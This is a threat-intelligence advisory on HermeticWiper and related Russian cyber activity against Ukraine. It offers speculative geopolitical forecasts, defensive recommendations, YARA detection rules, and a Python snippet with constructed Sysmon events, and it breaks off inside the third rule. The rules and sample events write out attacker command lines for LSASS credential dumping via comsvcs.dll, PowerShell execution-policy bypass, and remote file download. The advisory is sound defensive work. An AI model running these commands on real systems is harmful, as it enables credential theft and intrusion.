The DDoS attacks that accompanied the HermeticWiper deployment hit not only government websites and government contractors but also financial organizations in Ukraine and, reportedly, in NATO member states.

Note: As a retaliation to the cyber-kinetic attacks on Ukraine, the hacking group Anonymous Collective claims to have declared war on the Russian government.

Hypothesis:
We believe this series of activities is a classic case of cyberattacks used to build a smokescreen around political propaganda. Being well integrated into the European internet and with the West, Ukraine offers a convenient entry point into the rest of Europe and a launch pad for cyberattacks at a global level.

We expect similar long-term politically motivated cyberattacks as the newest addition in the global warfare weaponry.

While the kinetic attack on Ukraine is being witnessed at the global level, our threat intelligence team is closely monitoring the activities in the underground forums and dark web. With claims by random threat actors around the data leak of sensitive US personnel information – as retaliation to its support to Ukraine – we expect the dark web and underground forums to remain active with such spoils in the forthcoming days.

As per our threat intelligence team the ongoing Russia-Ukraine conflict can spill over and cause the following impact:

  • Threat to the Physical Security of Ukraine: As the military offensive between the two countries continues, there is a huge possibility that the Russian troops would work towards capturing Kyiv – the capital city of Ukraine – to possibly establish a proxy government favouring Russia.
  • Escalated Cyber Attacks: Attacks in cyberspace will continue to rise, with both sides and their allies targeting each other's organizations and their subsidiaries, vendors and partners with ransomware, wiper malware, DDoS attacks, and more, to cause operational disruption, reputational damage, and espionage.
  • Impact on Supply Chain: The ongoing conflict would impact the supply chain for many nations around the world that have ties with Ukraine and Russia for imports and exports of multiple items. The nations/organizations/individuals would have to now look for alternatives to minimize and meet expectations of the demand & supply.
  • Economic Repercussions: Due to the ongoing conflicts and dependence on the supply chain, price rise on vital items is quite expected, leading governments to rethink their plans and strategies for the coming years.
  • Anticipated Sanctions: Organizations having business/contracts with Russian organizations could be impacted due to the sanctions put in place and would find it difficult for the sale of components, sharing of technology, financial transactions, other business collaborations.
  • To conclude, the way Russia has managed to immobilize Ukraine through a series of cyberattacks is a glaring reminder of Sun Tzu’s words in “The Art of War” – often regarded as the Bible of Military Strategy – that a warring nation can gain victory by just subduing its enemy, without even engaging in a physical fight.

INSIGHTS:

  • Russian threat actors are suspected of using wiper malware against government entities, financial institutions, investment organizations, and critical infrastructure in NATO member nations and other nations taking a stand against the recent Russian aggression on Ukraine. The threat actors are believed to be targeting these organizations with the backing of their government and intelligence agencies, with little regard for the organizations' physical location.
  • The Russian cyberattacks are believed to be in retaliation for ongoing economic and diplomatic sanctions imposed by many nations led by the US & EU and pose a heightened risk of further escalation in the cyber world.
  • Their primary intent is to cause reputational damage to countries (and organizations from those countries) that are not in sync with their geopolitical agenda, to exfiltrate and wipe out sensitive data, to cause operational disruption, and to name and shame entities by selling their data in the grey market or to competitors for financial gain.
  • It is suspected that multiple assets have been targeted so far, and from a few assets, data has been wiped. We suspect more such vulnerable assets could be targeted in the coming days based on the development of the geopolitical situation in Europe.
  • While the Gamaredon group has in the past relied heavily on off-the-shelf tools, as early as December 2021 it was observed shifting to custom-developed malware. The group was noted to be using a novel RTF template injection technique in its phishing campaigns to retrieve malicious content from remote URLs. Apart from the recent deployment of eight custom binaries in cyber-espionage operations against Ukrainian entities, this hacking group is believed to be responsible for thousands of attacks in Ukraine since 2013.
  • As per researchers, WhisperGate consists of two samples: one appears as ransomware, while the other is a beaconing implant used to deliver an in-memory Microsoft Intermediate Language (MSIL) payload. The in-memory code uses Living Off the Land Binaries (LOLBins) to evade detection and also employs anti-analysis techniques, as it will fail to detonate when certain monitoring tools are present.

Indicators of Compromise:
Refer to the IOCs file to exercise controls on your security systems.

Targeted Recommendations:

  • Implement unified threat management and external threat landscape management programs, including malware detection, deep learning neural networks and anti-exploit technology, connected with vulnerability and risk mitigation.
  • Use threat intelligence services and continue to monitor the emerging threats arising from the Ukraine crisis and their impact.
  • It is recommended that organizations and their subsidiaries with operations in Ukraine undergo a thorough review of their business continuity and resilience plans.
  • Organizations with no direct contact or exposure to Ukraine should consider building a plan to avoid any sort of collateral damage that can arise from attacks in this region.
  • Identify supply chains that include components from Russia or Ukraine and consider alternative plans to diversify them.
  • To limit the likelihood of attackers using lateral-movement modules, disable PowerShell wherever possible.
  • It is recommended that organizations, regardless of the geography of their operations, incorporate Digital Risk Protection (DRP) as part of the overall security posture to proactively defend against impersonations and phishing attacks.
  • Use network segmentation within converged IT/OT environments as a critical security control, based on network type, purpose and access privileges, to limit the snowball effect in the event of a compromise of one network segment.
  • Build and undertake safeguarding measures by monitoring/ blocking the IOCs and strengthening defenses based on tactical intelligence provided.
  • Configure the provided YARA rules and Sigma rules in your network defense mechanisms to alert on attempted cyberattacks, monitor anomalies, and restrict traffic across the network.
  • In addition to applying patches in public-facing infrastructure, organizations should:
    • Consider deploying and configuring a File Integrity Monitoring solution to monitor and/or prevent the creation of files, especially on web servers outside of maintenance windows.
    • Enable enhanced logging and implement sufficient log retention periods to support investigations, including Microsoft System Monitor (Sysmon) on Windows servers and PowerShell Module, Script Block and Transcription logging.
    • Most of all, employ a robust endpoint security option that will allow your IT team to identify what confidential information is being stolen, when, and through what specific channel or device.

YARA Rules
Rule 1:
rule APT_UA_Hermetic_Wiper_Feb22_1 {
  meta:
    description = "Detects Hermetic Wiper malware"
    score = 75
    hash1 = "0385eeab00e946a302b24a91dea4187c1210597b8e17cd9e2230450f5ece21da"
    hash2 = "3c557727953a8f6b4788984464fb77741b821991acbf5e746aebdd02615b1767"
    hash3 = "2c10b2ec0b995b88c27d141d6f7b14d6b8177c52818687e4ff8e6ecf53adf5bf"
    hash4 = "1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591"
  strings:
    /* UTF-16 device paths and format strings used by the wiper */
    $xc1 = { 00 5C 00 5C 00 2E 00 5C 00 50 00 68 00 79 00 73
             00 69 00 63 00 61 00 6C 00 44 00 72 00 69 00 76
             00 65 00 25 00 75 00 00 00 5C 00 5C 00 2E 00 5C
             00 45 00 50 00 4D 00 4E 00 54 00 44 00 52 00 56
             00 5C 00 25 00 75 00 00 00 5C 00 5C 00 2E 00 5C
             00 00 00 00 00 25 00 73 00 25 00 2E 00 32 00 73
             00 00 00 00 00 24 00 42 00 69 00 74 00 6D 00 61
             00 70 00 00 00 24 00 4C 00 6F 00 67 00 46 00 69
             00 6C 00 65 }
    $sc1 = { 00 44 00 72 00 69 00 76 00 65 00 72 00 73 00 00
             00 64 00 72 00 76 00 00 00 53 00 79 00 73 00 74
             00 65 00 6D 00 33 00 32 }

    $s1 = "\\\\?\\C:\\Windows\\System32\\winevt\\Logs" wide fullword
    $s2 = "\\\\.\\EPMNTDRV\\%u" wide fullword
    $s3 = "DRV_XP_X64" wide fullword
    $s4 = "%ws%.2ws" wide fullword

    $op1 = { 8b 7e 08 0f 57 c0 8b 46 0c 83 ef 01 66 0f 13 44 24 20 83 d8 00 89 44 24 18 0f 88 3b 01 00 00 }
    $op2 = { 13 fa 8b 55 f4 4e 3b f3 7f e6 8a 45 0f 01 4d f0 0f 57 c0 }
  condition:
    ( uint16(0) == 0x5a53 or uint16(0) == 0x5a4d ) and
    filesize < 400KB and ( 1 of ($x*) or 3 of them )
}

Rule 2:
rule APT_UA_Hermetic_Wiper_Artefacts_Feb22_1 {
  meta:
    description = "Detects artefacts found in Hermetic Wiper malware related intrusions"
    score = 75
  strings:
    $sx1 = "/c powershell -c \"rundll32 C:\\windows\\system32\\comsvcs.dll MiniDump" ascii wide
    $sx2 = "appdata\\local\\microsoft\\windows\\winupd.log" ascii wide
    $sx3 = "AppData\\Local\\Microsoft\\Windows\\Winupd.log" ascii wide
    $sx4 = "CSIDL_SYSTEM_DRIVE\\temp\\sys.tmp1" ascii wide
    $sx5 = "\\policydefinitions\\postgresql.exe" ascii wide

    $sx6 = "powershell -v 2 -exec bypass -File text.ps1" ascii wide
    $sx7 = "powershell -exec bypass gp.ps1" ascii wide
    $sx8 = "powershell -exec bypass -File link.ps1" ascii wide

    /* 16 is the prefix of an epoch timestamp that shouldn't change until the 14th of November 2023 */
    $sx9 = " 1> \\\\127.0.0.1\\ADMIN$\\__16" ascii wide

    $sa1 = "(New-Object System.Net.WebClient).DownloadFile(" ascii wide
    $sa2 = "CSIDL_SYSTEM_DRIVE\\temp\\" ascii wide
    $sa3 = "1> \\\\127.0.0.1\\ADMIN$" ascii wide
  condition:
    1 of ($sx*) or all of ($sa*)
}
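The artefacts in Rule 2 are command-line fragments, so the same condition can be applied to endpoint process-creation telemetry and not only to files on disk. The following Python is an added example, not part of the advisory or of the rule author's code: it applies Rule 2's `1 of ($sx*) or all of ($sa*)` condition to constructed Sysmon Event ID 1 records, and goes one step beyond the rule by also matching the `ADMIN$\__<epoch>` output redirection for any 10-digit timestamp, which is my assumption about how that file name is formed, since the rule's hard-coded `__16` prefix stopped being current in November 2023.

```python
import re

# Artefact strings from the advisory's Rule 2, as the literal text YARA would match
# (escapes resolved; matching is case-sensitive, as in the rule).
SX_STRINGS = [
    r'/c powershell -c "rundll32 C:\windows\system32\comsvcs.dll MiniDump',
    r"appdata\local\microsoft\windows\winupd.log",
    r"AppData\Local\Microsoft\Windows\Winupd.log",
    r"CSIDL_SYSTEM_DRIVE\temp\sys.tmp1",
    r"\policydefinitions\postgresql.exe",
    r"powershell -v 2 -exec bypass -File text.ps1",
    r"powershell -exec bypass gp.ps1",
    r"powershell -exec bypass -File link.ps1",
    r" 1> \\127.0.0.1\ADMIN$\__16",  # epoch prefix "16": stops matching after 14 Nov 2023
]
SA_STRINGS = [
    "(New-Object System.Net.WebClient).DownloadFile(",
    "CSIDL_SYSTEM_DRIVE\\temp\\",
    r"1> \\127.0.0.1\ADMIN$",
]
# Assumption (not in the rule): "__16..." is "__" plus a Unix timestamp, so accept any
# 10-digit epoch instead of the hard-coded "16" prefix to keep the check valid after 2023.
ADMIN_SHARE_REDIRECT = re.compile(r" 1> \\\\127\.0\.0\.1\\ADMIN\$\\__\d{10}")

def match_rule2(command_line: str) -> bool:
    # Same condition as the YARA rule: 1 of ($sx*) or all of ($sa*)
    return any(s in command_line for s in SX_STRINGS) or all(s in command_line for s in SA_STRINGS)

def scan_events(events):
    # (event index, which check fired) for each Sysmon Event ID 1 record whose command line matches
    hits = []
    for i, ev in enumerate(events):
        if ev.get("EventID") != 1:
            continue
        cl = ev.get("CommandLine", "")
        if match_rule2(cl):
            hits.append((i, "rule2"))
        elif ADMIN_SHARE_REDIRECT.search(cl):
            hits.append((i, "admin-share-epoch"))
    return hits

# Constructed Sysmon process-creation records (not real telemetry), trimmed to the fields used
SAMPLE_EVENTS = [
    {"EventID": 1, "CommandLine": r'cmd.exe /Q /c powershell -c "rundll32 C:\windows\system32\comsvcs.dll MiniDump 624 C:\temp\s.dmp full" 1> \\127.0.0.1\ADMIN$\__1645633713.15 2>&1'},
    {"EventID": 1, "CommandLine": r"powershell -exec bypass -File link.ps1"},
    {"EventID": 1, "CommandLine": r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1700000000.12 2>&1"},
    {"EventID": 1, "CommandLine": r"powershell -nop -c (New-Object System.Net.WebClient).DownloadFile('http://example.invalid/a','C:\temp\a')"},
    {"EventID": 1, "CommandLine": r"svchost.exe -k netsvcs -p"},
]
```

The fourth record shows why the `all of ($sa*)` branch matters: a lone `DownloadFile(` is too common to alert on by itself, so it only fires together with the other two `$sa` artefacts.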

Rule 3:
rule APT_UA_Hermetic_Wiper_Scheduled_Task_Feb22_1 {
  meta:
    description = "Detects scheduled task pattern found in Hermetic Wiper malware related intrusions"
    score = 85
  strings:
    $a0 = "